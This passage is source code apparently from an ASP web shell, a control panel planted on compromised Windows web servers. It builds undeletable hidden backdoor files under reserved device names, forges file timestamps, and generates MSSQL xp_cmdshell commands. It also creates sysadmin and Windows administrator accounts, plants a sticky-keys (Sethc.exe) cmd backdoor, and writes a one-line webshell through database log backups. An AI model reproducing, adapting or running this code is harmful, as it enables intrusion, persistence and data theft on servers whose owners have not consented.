strFileMethod="fso"Then If Not objFso.FolderExists(thePath)Then errMsgAdd thePath&" Folder dosen't exists or access denied!" doFin End If End If doShowHideme"Folders",False doTable"100%" doTh doTd"<b>Folder name</b>","" doTd"<b>Size</b>","" doTd"<b>Last modIfied</b>","" echo"<td><b>Action</b>" If strFileMethod="fso"Then echo" - " doSubHref goaction,"mkDoor",doPathFormat(thePath),"Make a hidden backdoor here","" End If echo"</td>" doTtr doTr 0 echo"<td colspan=""4"">" doSubHref goaction,"",doPathFormat(parentFolderName),"Parent Directory","" echo"</td>" doTtr trId=1 If strFileMethod="fso"Then For Each objX In theFolder.SubFolders objLastModIfied=objX.DateLastModIfied doTr trId echo"<td>" doSubHref goaction,"",objX.Name,objX.Name,"" echo"</td>" doTd htmlEnc("<dir>"),"" doTd objLastModIfied,"" echo"<td>" doSubHref goaction,"cpFolder",objX.Name,"Copy"," -" doSubHref goaction,"mvFolder",objX.Name,"Move"," -" doSubHref goaction,"rnFolder",objX.Name,"Rename"," -" doSubHref "AddToMdb","fsoPack",objX.Name,"Package"," -" doSubHref goaction,"delFolder",objX.Name,"Delete","" echoLine"</td>" doTtr trIdAdd Next Else For Each objX In theFolder.Items If objX.IsFolder Then objLastModIfied=theFolder.GetDetailsOf(objX,3) doTr trId echo"<td>" doSubHref goaction,"",objX.Name,objX.Name,"" echo"</td>" doTd htmlEnc("<dir>"),"" doTd objLastModIfied,"" echo"<td>" doSubHref goaction,"rnFolder",objX.Name,"Rename"," -" doSubHref "AddToMdb","appPack",objX.Name,"Package","" echoLine"</td>" doTtr trIdAdd End If Next End If doTtable echoLine"</span><br>" doShowHideme"Files",False doTable"100%" echo"<b>" doTh doTd"<b>File name</b>","" doTd"<b>Size</b>","" doTd"<b>Last modIfied</b>","" doTd"<b>Action</b>","" doTtr echo"</b>" trId=0 If strFileMethod="fso"Then For Each objX In theFolder.Files objSize=GetTheSize(objX.Size) objLastModIfied=objX.DateLastModIfied If Lcase(Left(objX.Path,Len(rootPath)))<>Lcase(rootPath) Then folderId="" Else folderId=Replace(Replace(UrlEnc(Mid(objX.Path,Len(rootPath)+1)),"%2E","."),"+","%20") End If doTr trId If folderId=""Then doTd objX.Name,"" Else doTd"<a href='"&Replace(folderId,"%5C","/")&"' target=_blank>"&objX.Name&"</a>","" End If doTd objSize,"" doTd objLastModIfied,"" echo"<td>" doSubHref goaction,"showEdit",objX.Name,"Edit"," -" doSubHref goaction,"cpFile",objX.Name,"Copy"," -" doSubHref goaction,"mvFile",objX.Name,"Move"," -" doSubHref goaction,"rnFile",objX.Name,"Rename"," -" doSubHref goaction,"down",objX.Name,"Down"," -" doSubHref goaction,"getattrib",objX.Name,"Attributes"," -" doSqlHref "showTables",objX.Name,"","","","Database"," -" doSubHref goaction,"delFile",objX.Name,"Delete","" echoLine"</td>" doTtr trIdAdd Next Else For Each objX In theFolder.Items If Not objX.IsFolder Then Dim fName fName=getRight(objX.Path,"\") fullPath=doPathFormat(objX.Path) objSize=theFolder.GetDetailsOf(objX,1) objLastModIfied=theFolder.GetDetailsOf(objX,3) If Lcase(Left(objX.Path,Len(rootPath)))<>Lcase(rootPath) Then folderId="" Else folderId=Replace(Replace(UrlEnc(Mid(objX.Path,Len(rootPath)+1)),"%2E","."),"+","%20") End If doTr trId If folderId=""Then doTd getRight(objX.Path,"\"),"" Else doTd"<a href='"&Replace(folderId,"%5C","/")&"' target=_blank>"& getRight(objX.Path,"\")&"</a>","" End If doTd objSize,"" doTd objLastModIfied,"" echo"<td>" doSubHref goaction,"showEdit",fName,"Edit"," -" doSubHref goaction,"rnFile",fName,"Rename"," -" doSubHref goaction,"down",fName,"Down"," -" doSubHref goaction,"getattrib",fName,"Attributes"," -" doSqlHref "showTables",fName,"","","","Database","" echoLine"</td>" doTtr trIdAdd End If Next End If doTtable echo"</span>" chkerr(Err) End Sub Sub getAttributes() Dim fsoTheFile,appTheFile,strName,strAtt,intValue,objFolder,strPth,refName If Not isDebugMode Then On Error Resume Next If IsObject(objFso)Then Set fsoTheFile=objFso.GetFile(thePath) End If If IsObject(objSa)Then strPth=getLeft(thePath,"\",False) strName=getRight(thePath,"\") Set objFolder=objSa.NameSpace(strPth) Set appTheFile=objFolder.ParseName(strName) End If echo"<center>" doTable"60%" doForm True doHidden"subAct","Setattrib" doHidden"thePath",thePath doTr 1 doTdSubmit"Set / Clone","" doTd thePath,"" doTtr doTr 0 doTd"Attributes","" If IsObject(objFso)Then intValue=fsoTheFile.Attributes strAtt="<input type=checkbox name=fsoAttrib value=4 class='input' {$system}>system " strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=2 class='input' {$hidden}>hide " strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=1 class='input' {$readonly}>readonly " strAtt=strAtt&"<input type=checkbox name=fsoAttrib value=32 class='input' {$archive}>save " If intValue>=128 Then intValue=intValue-128 If intValue>=64 Then intValue=intValue-64 If intValue>=32 Then intValue=intValue-32 strAtt=Replace(strAtt,"{$archive}","checked") End If If intValue>=16 Then intValue=intValue-16 If intValue>=8 Then intValue=intValue-8 If intValue>=4 Then intValue=intValue-4 strAtt=Replace(strAtt,"{$system}","checked") End If If intValue>=2 Then intValue=intValue-2 strAtt=Replace(strAtt,"{$hidden}","checked") End If If intValue>=1 Then intValue=intValue-1 strAtt=Replace(strAtt,"{$readonly}","checked") End If doTd strAtt,"" Else doTd"FSO object disabled,can't get/Set attributes -_-~!","" End If doTtr If IsObject(objSa)Then doTr 1 doTd"Date created","" doTd objFolder.GetDetailsOf(appTheFile,4),"" doTtr doTr 0 doTd"Date last modIfied","" doTdInput"text","datem",objFolder.GetDetailsOf(appTheFile,3),"","","" doTtr doTr 1 doTd"Date last accessed","" doTd objFolder.GetDetailsOf(appTheFile,5),"" doTtr Else doTr 1 doTd"Date created","" doTd fsoTheFile.DateCreated,"" doTtr doTr 0 doTd"Date last modIfied","" doTd fsoTheFile.DateLastModIfied,"" doTtr doTr 1 doTd"Date last accessed","" doTd fsoTheFile.DateLastAccessed,"" doTtr End If doTr 0 If IsObject(objSa)Then doTd"Clone time ","" echo"<td>" doSelect"strRefFile","100%","" doOption "","Do not clone" For Each objX In objFolder.Items If Not objX.IsFolder Then refName=getRight(objX.Path,"\") doOption refName,objFolder.GetDetailsOf(objFolder.ParseName(refName),3)&" --- "&refName End If Next Else echo"<td colspan=2>App object disabled,can't modIfy time -_-~!</td>" End If doTtable doFform doFin() End Sub Sub SetAttributes() If Not isDebugMode Then On Error Resume Next Dim myAttributes,fsoTheFile,strPth,strName,objFolder,appTheFile If IsObject(objFso)Then Set fsoTheFile=objFso.GetFile(thePath) End If If IsObject(objSa)Then strPth=getLeft(thePath,"\",False) strName=getRight(thePath,"\") Set objFolder=objSa.NameSpace(strPth) Set appTheFile=objFolder.ParseName(strName) End If If fsoAttrib<>""Then fsoAttrib=Split(Replace(fsoAttrib," ",""),",") For i=0 To UBound(fsoAttrib) myAttributes=myAttributes+CInt(fsoAttrib(i)) Next fsoTheFile.Attributes=myAttributes If Err Then chkErr(Err) Else errMsgAdd"Attributes modIfied" End If End If If strRefFile=""Then If datem<>"" And IsDate(datem)Then appTheFile.ModIfyDate=datem If Err Then chkErr(Err) Else errMsgAdd"Time modIfied" End If End If Else appTheFile.ModIfyDate=objFolder.GetDetailsOf(objFolder.ParseName(strRefFile),3) If Err Then chkErr(Err) Else errMsgAdd"Time modIfied" End If End If End Sub Sub MakeBackDoor() If fileName<>""Then Dim savePath,fTheFile savePath="\\.\"&thePath&"\"&fileName If moveme=1 Then Call objFso.MoveFile(getServerVariable("PATH_TRANSLATED"),savePath) Set fTheFile=objFso.GetFile(savePath) fTheFile.Attributes=6 Response.Redirect(fileName) Else fsoSaveToFile savePath,fileContent Set fTheFile=objFso.GetFile(savePath) fTheFile.Attributes=6 End If If Err Then chkErr(err) Else errMsgAdd("Backdoor established,have fun.") End If Exit Sub End If doForm True doTable"100%" doHidden"subAct","mkDoor" echoLine"<b>Make hidden backdoor</b><br>" doTable"100%" doTr 1 doTd"Path","20%" doTdInput"text","thePath",thePath,"60%","","" doTdSubmit"Save","20%" doTtr doTr 0 doTd"Content","" doTdText "fileContent","",10 echo"<td>" doChkBox"moveme",1,"Move myself there","onclick='javascript:document.getElementById(""fileContent"").disabled=this.checked'" echo"</td>" doTtr doTr 1 echo"<td>" doSelect"fileName","100%","" doOption"aux.asp","aux.asp" doOption"con.asp","con.asp" doOption"com1.asp","com1.asp" doOption"com2.asp","com2.asp" doOption"nul.asp","nul.asp" doOption"prn.asp","prn.asp" doSselect echo"</td>" echoLine"<td colspan='2'>Cannot del,cannot open in ordinary way,this will drive the web administrator madness :)</td>" doTtr doTtable doFform doFin End Sub Sub PageMsDataBase() If Not isDebugMode Then On Error Resume Next If connStr=""Then connStr=Request.Cookies(cookiePre&"connStr") ShowDBTool() If connStr<>""Then Select Case subAct Case"showQuery" showQuery() Case"delTable" delTable() Case"expTable" expTable() Case"saup","sadown" saFile() Case Else showTables() End Select End If DestoryConn doFin End Sub Sub ShowDBTool() Dim rs,rolearr,strfuncs,showfuncs If Not isDebugMode Then On Error Resume Next showTitle("Database Operation") doForm True echoLine"Connect String : " doInput"text","connStr",connStr,160,"" echo" " doSubmit"OK" doFform doShowHideMe"GetConnectString",True doTable"100%" doTr 1 doTd"SqlOleDb","10%" echoLine"<td style=""width:80%"">Server:" doInput"text","MsServer","127.0.0.1","15","" echo" Username:" doInput"text","MsUser","sa","10","" echo" Password:" doInput"text","MsPass","","10","" echo" DataBase:" doInput"text","DBPath","","10","" echo"</td>" doTdInput"button","","Generate","10%","onClick=""javascript:getconnStr(MsServer.value,MsUser.value,MsPass.value,DBPath.value)""","" doTtr doTr 0 doTd"Jet","" echoLine"<td>DB path:" doInput"text","accdbpath",aspPath&"\","82","" echo"</td>" doTdInput"button","","Generate","10%","onClick=""javascript:getAccStr(accdbpath.value)""","" doTtr doTtable echo"</span><hr>" If Err Then Err.clear If connStr<>""Then CreateConn connStr Response.Cookies(cookiePre&"connStr")=connStr Set rs=CreateObj("Adodb.RecordSet") rs.Open "select @@version,db_name()",conn,1,1 If Err Then dbType="access" Err.clear Set rs=Nothing Set rs=CreateObj("Adodb.RecordSet") rs.Open "select cstr('access')",conn,1,1 If Err Then dbType="others" Err.clear End If rs.Close Set rs=Nothing Else sqlver=rs(0) dbname=rs(1) rs.close dbType="mssql" %> <script language=vbscript> Function getRegPath(path) Dim regRoot,regPath,regKey regRoot=getLeft(path,"\",True) path=Mid(path,Len(regRoot)+2) regKey=getRight(path,"\") regPath=getLeft(path,"\",False) getRegPath=Array(regRoot,regPath,regKey) End Function Function doXpStr(xpcmdstr) form2.queryStr.value="exec master..xp_cmdshell '"&xpcmdstr&"'" End Function Function doRegStr(regpath) Dim regarr regarr=getRegPath(regpath) form2.queryStr.value="exec master..xp_regread '"®arr(0)&"','"®arr(1)&"','"®arr(2)&"'" End Function Function doXpDirStr(xpdirstr) form2.queryStr.value="exec master..xp_dirtree '"&xpdirstr&"',1,1" End Function Function doSpStr(spstr,sptemp,spstep) If spstep=2 Then form2.queryStr.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&sptemp&"'" Else form2.queryStr.value="declare @a int;exec master..sp_oacreate'wscript.shell',@a output;exec master..sp_oamethod @a,'run',null,'"&spstr&" > "&sptemp&"',0,'true'" End If End Function Function doBoxStr(boxstr,boxpath,boxtemp,boxstep) Select Case boxstep Case 1 form2.queryStr.value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0" Case 2 boxstr=Replace(boxstr,"""","""""") form2.queryStr.value="Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database="&boxpath&"','select shell("""&boxstr&" > "&boxtemp&""")')" Case 3 form2.queryStr.value="If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa nvarchar(4000));bulk insert dark_temp from'"&boxtemp&"'" End Select End Function Function doFsoStr(fsoori,fsotag) form2.queryStr.value="declare @a int;exec master..sp_oacreate'Scripting.FileSystemObject',@a output;exec master..sp_oamethod @a,'CopyFile',null,'"&fsoori&"','"&fsotag&"'" End Function Function doMakeCab(cabori,cabtag) form2.queryStr.value="exec master..xp_makecab 'C:\windows\temp\~098611.tmp','default',1,'"&cabori&"';exec master..xp_unpackcab 'C:\windows\temp\~098611.tmp','"&getLeft(cabtag,"\",False)&"',1,'"&getRight(cabtag,"\")&"'" End Function Function doAddSp(addsptag,addspdll) form2.queryStr.value="Use master;dbcc addextEndedproc('"&addsptag&"','"&addspdll&"')" End Function Function doDelSp(delsptag) form2.queryStr.value="Use master;dbcc dropextEndedproc('"&delsptag&"')" End Function Function doEnableSp(ensptag) form2.queryStr.value="EXEC master..sp_configure 'show advanced options',1;RECONFIGURE;EXEC master..sp_configure '"&ensptag&"',1;RECONFIGURE" End Function Function doRegWrite(rwpath,rwtype,rwvalue) Dim regarr regarr=getRegPath(rwpath) form2.queryStr.value="exec master..xp_regwrite '"®arr(0)&"','"®arr(1)&"','"®arr(2)&"','"&rwtype&"','"&rwvalue&"'" End Function Function doAddLogin(name,pass) form2.queryStr.value="exec master..sp_addlogin '"&name&"','"&pass&"';exec master..sp_addsrvrolemember '"&name&"','sysadmin'" End Function Function doAddSysUser(name,pass) form2.queryStr.value="declare @a int;exec master..sp_oacreate 'ScriptControl',@a output;exec master..sp_oasetproperty @a,'language','VBScript';exec master..sp_oamethod @a,'addcode',null,'sub add():Set o=CreateObject(""Shell.Users""):Set u=o.create("""&name&"""):u.changePassword """&pass&""","""":u.setting(""AccountType"")=3:end sub';exec master..sp_oamethod @a,'run',null,'add'" End Function Function doLogBackup(logcontent,logpath,dbname,stepp) Select Case stepp Case 1 form2.queryStr.value="alter database "&dbname&" Set recovery full;dump transaction "&dbname&" with no_log;If object_id('dark_temp')is not null drop table dark_temp;create table dark_temp(aa sql_variant primary key)" Case 2 form2.queryStr.value="backup database "&dbname&" to disk='C:\windows\temp\~098611.tmp' with init" Case 3 form2.queryStr.value="insert dark_temp values('"&Replace(logcontent,"'","''")&"')" Case 4 form2.queryStr.value="backup log "&dbname&" to disk='"&logpath&"';drop table dark_temp" End Select End Function Function chgDb(dbname) On Error Resume Next Dim regex,olddb Set regex=new RegExp regex.Global=True regex.IgnoreCase=True regex.MultiLine=True regex.Pattern="(Database|Initial Catalog) *=[^;]+" If regex.test(sqlForm.connStr.value)Then sqlForm.connStr.value=secretEncode(regex.Replace(sqlForm.connStr.value,"$1="&dbname)) sqlForm.subAct="showTables" sqlForm.submit Else Window.alert("Can not get database name in connect string!") End If End Function Function getLeft(str,sign,fromLeft) If str="" Or InStr(str,sign)<1 Then getLeft="" Exit Function End If If fromLeft Then getLeft=Left(str,InStr(str,sign)-1) Else getLeft=Left(str,InstrRev(str,sign)-1) End If End Function Function getRight(str,sign) If str="" Or InStr(str,sign)<1 Then getRight="" Exit Function End If getRight=Mid(str,InstrRev(str,sign)+Len(sign)) End Function </script> <% End If If subAct="showQuery"And queryStr=""Then If dbType="others"Then queryStr="select * from "&strTable Else queryStr="select * from ["&strTable&"]" End If End If doSqlHref "showTables","","","","","Show Tables","" echo"<br>" doForm True doHidden"subAct","showQuery" doHidden"connStr",connStr doTable"100%" If dbType="mssql"Then doTr 1 echoLine"<td colspan=3>Version : "&htmlEnc(sqlver)&"</td>" doTtr rolearr="sysadmin|db_owner|public" doTr 0 echo"<td colspan=3>" For Each strrole In Split(rolearr,"|") If strrole="sysadmin"Then rs.Open "select IS_SRVROLEMEMBER('"&strrole&"')",conn,1,1 Else rs.Open "select IS_ROLEMEMBER('"&strrole&"')",conn,1,1 End If If rs(0)=1 Then echo "Current ServerRole : <font color='red'>"&strrole&"</font> " rs.close Exit For End If rs.close Next echo "| Switch Database : " rs.Open "select name from master..sysdatabases",conn,1,1 rs.movefirst Do While Not rs.eof echo "<a href=javascript:chgDb('"&rs("name")&"')>"&rs("name")&"</a> | " rs.movenext Loop echo"</td></tr>" trIdAdd rs.close Set rs=Nothing End If doTr 1 doTd"Execute Sql","10%" doTdText"queryStr",queryStr,5 doTdSubmit"Submit","10%" doTtr doTtable doFform If dbType="mssql"Then echo"Functions : " strfuncs=Split("xp_cmd|xp_dir|xp_reg|xp_regw|wsexec|sbexec|fsocopy|makecab|addproc|delproc|enfunc|addlogin|addsys|logback|saup|sadown","|") showfuncs=Split("xp_cmdshell|xp_dirtree|xp_regread|xp_regwrite|ws exec|sandbox exec|FSO copy|Cab copy|add procedure|del procedure|enable function|add sql user|add sys user|logbackup|saupfile|sadownfile","|") For i=0 To UBound(strfuncs) echo"<a href='#' onClick=""javascript:showHideMe("&strfuncs(i)&")"" class='hidehref'>"&showfuncs(i)&"</a> | " Next echo"<br><br>" doHideSpan"xp_cmd",True doTable"100%" doTr 1 doTd"Command","10%" doTdInput"text","xpcmdstr","net user","80%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doXpStr(xpcmdstr.value)""","" doTtr doTtable echo"</span>" doHideSpan"xp_dir",True doTable"100%" doTr 1 doTd"Path","10%" doTdInput"text","xpdirstr",aspPath,"80%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doXpDirStr(xpdirstr.value)""","" doTtr doTtable echo"</span>" doHideSpan"xp_reg",True doTable"100%" doTr 1 doTd"Path","10%" doTdInput"text","xpregpath","HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName","80%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doRegStr(xpregpath.value)""","" doTtr doTtable echo"</span>" doHideSpan"xp_regw",True doTable"100%" doTr 1 doTd"Path","10%" doTdInput"text","rwpath","HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Sethc.exe\debugger","80%","","4" doTtr doTr 0 doTd"Type","" doTdInput"text","rwtype","REG_SZ","30%","","" doTd"Value","" doTdInput"text","rwvalue","cmd.exe","40%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doRegWrite(rwpath.value,rwtype.value,rwvalue.value)""","" doTtr doTtable echo"</span>" doHideSpan"wsexec",True doTable"100%" doTr 1 doTd"Command","10%" doTdInput"text","spstr","cmd /c net user","","","4" doTtr doTr 0 doTd"Temp File","" doTdInput"text","sptemp","C:\WINDOWS\Temp\~098611.tmp","50%","","" doTd"Step","20%" echo"<td width='10%'>" doSelect"spstep","100%","" doOption 1,1 doOption 2,2 doSselect echo"</td>" doTdInput"button","","Generate","10%","onClick=""javascript:doSpStr(spstr.value,sptemp.value,spstep.value)""","" doTtr doTtable echo"</span>" doHideSpan"sbexec",True doTable"100%" doTr 1 doTd"Command","10%" doTdInput"text","boxstr","cmd /c net user","","","5" doTtr doTr 0 doTd"Mdb Path","" doTdInput"text","boxpath","C:\windows\system32\ias\ias.mdb","30%","","" doTd"Temp File","10%" doTdInput"text","boxtemp","C:\WINDOWS\Temp\~098611.tmp","30%","","" echo"<td width='10%'>Step " doSelect"boxstep","40px","" doOption 1,1 doOption 2,2 doOption 3,3 doSselect echo"</td>" doTdInput"button","","Generate","10%","onClick=""javascript:doBoxStr(boxstr.value,boxpath.value,boxtemp.value,boxstep.value)""","" doTtr doTtable echo"</span>" doHideSpan"fsocopy",True doTable"100%" doTr 1 doTd"Source","10%" doTdInput"text","fsoori","C:\WINDOWS\system32\cmd.exe","35%","","" doTd"Target","10%" doTdInput"text","fsotag","C:\WINDOWS\system32\Sethc.exe","35%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doFsoStr(fsoori.value,fsotag.value)""","" doTtr doTtable echo"</span>" doHideSpan"makecab",True doTable"100%" doTr 1 doTd"Source","10%" doTdInput"text","cabori","C:\WINDOWS\system32\cmd.exe","35%","","" doTd"Target","10%" doTdInput"text","cabtag","C:\WINDOWS\system32\Sethc.exe","35%","","" doTdInput"button","","Generate","10%","onClick=""javascript:doMakeCab(cabori.value,cabtag.value)""","" doTtr doTtable echo"</span>" doHideSpan"addproc",True doTable"80%%" doTr 1 doTd"Procedure","20%" echo"<td width='20%'>" doSelect"addsptag","100%","" doOption "xp_cmdshell","xp_cmdshell" doOption "xp_dirtree","xp_dirtree" doOption "xp_regread","xp_regread" doOption "xp_regwrite","xp_regwrite" doOption "sp_oacreate","sp_oacreate" doSselect doTd"DLL","20%" echo"<td width='20%'>" doSelect"addspdll","100%","" doOption "xplog70.dll","xplog70.dll" doOption "xpstar.dll","xpstar.dll" doOption "odsole70.dll","odsole70.dll" doSselect doTdInput"button","","Generate","20%","onClick=""javascript:doAddSp(addsptag.value,addspdll.value)""","" doTtr doTtable echo"</span>" doHideSpan"delproc",True doTable"40%" doTr 1 doTd"Procedure","30%" echo"<td width='40%'>" doSelect"delsptag","100%","" doOption "xp_cmdshell","xp_cmdshell" doOption "xp_dirtree","xp_dirtree" doOption "xp_regread","xp_regread" doOption "xp_regwrite","xp_regwrite" doOption "sp_oacreate","sp_oacreate" doSselect echo"</td>" doTdInput"button","","Generate","30%","onClick=""javascript:doDelSp(delsptag.value)""","" doTtr doTtable echo"</span>" doHideSpan"enfunc",True doTable"40%" doTr 1 doTd"Function","30%" echo"<td width='40%'>" doSelect"ensptag","100%","" doOption "xp_cmdshell","xp_cmdshell" doOption "Ole Automation Procedures","sp_oacreate" doOption "Ad Hoc Distributed Queries","openrowSet" doSselect echo"</td>" doTdInput"button","","Generate","30%","onClick=""javascript:doEnableSp(ensptag.value)""","" doTtr doTtable echo"</span>" doHideSpan"addlogin",True doTable"80%" doTr 1 doTd"Username","10%" doTdInput"text","addusername","Bloodsword$","30%","","" doTd"Password","10%" doTdInput"text","adduserpass","0kee","30%","","" doTdInput"button","","Generate","20%","onClick=""javascript:doAddLogin(addusername.value,adduserpass.value)""","" doTtr doTtable echo"</span>" doHideSpan"addsys",True doTable"80%" doTr 1 doTd"Username","10%" doTdInput"text","sysname","Bloodsword$","30%","","" doTd"Password","10%" doTdInput"text","syspass","0kee","30%","","" doTdInput"button","","Generate","20%","onClick=""javascript:doAddSysUser(sysname.value,syspass.value)""","" doTtr doTtable echo"</span>" doHideSpan"logback",True doTable"100%" doTr 1 doTd"Content","10%" echo"<td colspan='4'>" doTextarea"logContent","<%response.clear:execute request(""value""):response.End%"&">","100%",5,"" echo"</td>" doTdInput"button","","Generate","10%","onClick=""javascript:doLogBackup(logContent.value,logPath.value,logdb.value,logstep.value)""","" doTtr doTr 0 doTd"Path","10%" doTdInput"text","logPath",mapath(".")&"\system.asp","40%","","" doTd"Database","10%" doTdInput"text","logdb",dbname,"20%","","" doTd"Step","10%" echo"<td width='10%'>" doSelect"logstep","100%","" doOption 1,1 doOption 2,2 doOption 3,3 doOption 4,4 doSselect echo"</td>" doTtr doTtable echo"</span>" doHideSpan"saup",True echoLine"<form method=""post"" id=""saform""action="""&pagePath&"""enctype=""multipart/form-data"">" doHidden"goaction",goaction doHidden"subAct","saup" doHidden"connStr",connStr doTable"100%" doTr 1 doTdInput"file","safile","","30%","","" echoLine"<td align='right'>Save as(full path):</td>" doTdInput"text","thePath","","40%","","" doTdInput"button","","Upload","10%","onClick=""javascript:dosubmit('"&goaction&"','safile','')""","" doTtr doTtable doFform echo"</span>" doHideSpan"sadown",True doForm True doHidden"subAct","sadown" doHidden"connStr",connStr doTable"100%" doTr 1 doTd"Remoto file(full path)","" doTdInput"text","loadPath","","30%","","" doTd"Save as","" doTdInput"text","thePath",asppath,"30%","","" doTdSubmit"Download","10%" doTtr doTtable doFform echo"</span>" End If echo"<hr>" End If End Sub Sub delTable() If Not isDebugMode Then On Error Resume Next If dbType<>"others" Then strTable="["&strTable&"]" conn.Execute"drop table "&strTable,-1,&H0001 If Err Then chkErr(Err) Else errMsgAdd("Table deleted.") End If showTables() End Sub Sub expTable() If Not isDebugMode Then On Error Resume Next If dbType<>"others" Then strTable="["&strTable&"]" Dim rs Set rs=conn.Execute("select * from "&strTable,-1,&H0001) dieErr(Err) If rs.Fields.Count>0 Then Response.Clear Session.CodePage=936 Response.AddHeader"Content-Disposition","Attachment; Filename="&strTable&".xls" Session.CodePage=65001 Response.AddHeader"Content-Type","application / ms - excel" echo"<table border=1><tr>" For i=0 To rs.Fields.Count-1 echo"<td><b>"&rs.Fields(i).Name&"</b></td>" Next echo"</tr>" Do Until rs.EOF echo"<tr>" For i=0 To rs.Fields.Count-1 echo"<td>"&htmlEnc(rs(i))&"</td>" Next echo"</tr>" rs.MoveNext Loop echo"</table>" Else errMsgAdd"It's empty." showTables() doFin End If rs.Close Set rs=Nothing response.End End Sub Sub saFile() strfrm="8.0|1|1 SQLIMAGE 0 {size} """" 1 binfile """"|" conn.execute "If object_id('dark_temp')is not null drop table dark_temp" If InStr(sqlver,"Microsoft SQL Server 2005")>0 Then strfrm=Replace(strfrm,"8.0","9.0") conn.execute("EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;") End If If subAct="sadown"Then Dim rs,size If thePath=""Or loadPath="" Then errMsgAdd"Not enough parameters." showTables() doFin ElseIf InstrRev(loadPath,".")<InstrRev(loadPath,"\")Then errMsgAdd"You can't download a folder -_-~!" showTables() doFin ElseIf InstrRev(thePath,".")<InstrRev(thePath,"\")Then thePath=thePath&"\"&getRight(loadPath,"\") End If Set rs=CreateObj("Adodb.RecordSet") Set rs=conn.execute("EXEC master..xp_cmdshell 'dir """&loadPath&""" | find """&getRight(loadPath,"\")&"""'",-1,&H0001) rs.movefirst size=Replace(Trim(regExecute(rs(0)," [0-9,]+ ",False)(0)),",","") If size=""Or Not IsNumeric(size)Then errMsgAdd("Get size error.") doFin End If strfrm=Replace(strfrm,"{size}",size) rs.Close Set rs=Nothing Else strfrm=Replace(strfrm,"{size}",0) End If arrfrm=Split(strfrm,"|") For Each substrfrm In arrfrm conn.execute("EXEC master..xp_cmdshell 'echo "&substrfrm&" >>c:\tmp.fmt'") Next If subAct="saup"Then saUpload() Else saDownload() End If conn.execute "If object_id('dark_temp')is not null drop table dark_temp" conn.execute("EXECUTE master..xp_cmdshell 'del c:\tmp.fmt'") showTables() End Sub Sub saUpload() If Not isDebugMode Then On Error Resume Next Dim rs,theFile,arrfrm,nowdb If thePath="" Then thePath=aspPath If InStr(thePath,":")<1 Then thePath=aspPath&"\"&thePath Set theFile=cls_upload.File("safile") If InstrRev(thePath,"\")>InstrRev(thePath,".")Then thePath=thePath&"\"&theFile.FileName conn.execute "CREATE TABLE [dark_temp] ([id] [int] NULL ,[binfile] [Image] NULL) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY];" Set rs=CreateObj("Adodb.RecordSet") rs.Open "SELECT * FROM dark_temp where id is null",conn,1,3 rs.AddNew rs("binfile").AppendChunk theFile.InFile() rs.Update conn.execute("exec master..xp_cmdshell'bcp ""select binfile from "&dbname&"..dark_temp"" queryout """&thePath&""" -T -f c:\tmp.fmt'") set rs=conn.execute("EXECUTE master..xp_fileexist '"&thePath&"'") If Err Then chkErr(Err) ElseIf rs(0)=1 Then errMsgAdd("File uploaded, have fun.") Else errMsgAdd("Upload failed, RPWT?") End If rs.close Set rs=Nothing End Sub Sub saDownload() Dim rs If Not isDebugMode Then On Error Resume Next conn.execute "CREATE TABLE [dark_temp] ([binfile] [Image] NULL)" conn.execute("exec master..xp_cmdshell'bcp """&dbname&"..dark_temp"" in """&loadpath&""" -T -f c:\tmp.fmt'") Set rs=CreateObj("Adodb.RecordSet") rs.Open "select * from dark_temp",conn,1,1 streamSaveToFile thePath,rs(0),1 If Err Then chkErr(Err) Else errMsgAdd("File downloaded,have fun.") End If rs.close Set rs=Nothing End Sub Sub showTables() Dim objTable,objColumn,intDefinedSize,strNullAble,spanId,rsTable If Not isDebugMode Then On Error Resume Next spanId=1 trId=0 Set rsTable=conn.OpenSchema(20,Array(Empty,Empty,Empty,"table")) dieErr(Err) Do Until rsTable.Eof doSpan spanId doLabel"<b>"&rsTable("Table_Name")&"</b>" echo"<label>" doSqlHref "showQuery","","",rsTable("Table_Name"),"","Show content","" echo"</label>" echo"<label>" doSqlHref "showStructure","","",rsTable("Table_Name"),"","Show structure","" echo"</label>" echo"<label>" doSqlHref "expTable","","",rsTable("Table_Name"),"","Export","" echo"</label>" echo"<label>" doSqlHref "delTable","","",rsTable("Table_Name"),"","Delete","" echo"</label>" If subAct="showStructure"And strTable=rsTable("Table_Name")Then Set rsColumn=conn.OpenSchema(4,Array(Empty,Empty,rsTable("Table_Name").value)) echo"<span>" echo"<center>" doTable"80%" doTr trId trIdAdd doTd"Name","" doTd"Type","" doTd"Size","" doTd"Nullable","" doTtr Do Until rsColumn.Eof intDefinedSize=rsColumn("Character_Maximum_Length") If intDefinedSize="" Then intDefinedSize=rsColumn("Is_Nullable") doTr trId doTd rsColumn("Column_Name"),"" doTd getDataType(rsColumn("Data_Type")),"" doTd intDefinedSize,"" doTd rsColumn("Is_Nullable"),"" doTtr trIdAdd rsColumn.MoveNext Loop doTtable echo"</center></span>" End If echoLine"<br></span>" trIdAdd spanId=spanId+1 If spanId=2 Then spanId=0 rsTable.MoveNext Loop Set rsTable=Nothing Set rsColumn=Nothing chkerr(Err) End Sub Sub showQuery() Dim i,j,x,rs,Cat,strPrimaryKey,sExec,pageNum,tmpQueryStr If Not isDebugMode Then On Error Resume Next Set Cat=CreateObj("ADOX.Catalog") Cat.ActiveConnection=conn.ConnectionString Set rs=CreateObj("Adodb.RecordSet") If Lcase(Left(queryStr,7))="select " And dbType<>"others" Then If intPage=""Then intPage=1 rs.Open queryStr,conn,1,1 dieErr(Err) intPage=CInt(intPage) rs.PageSize=sqlPageSize If Not rs.Eof Then 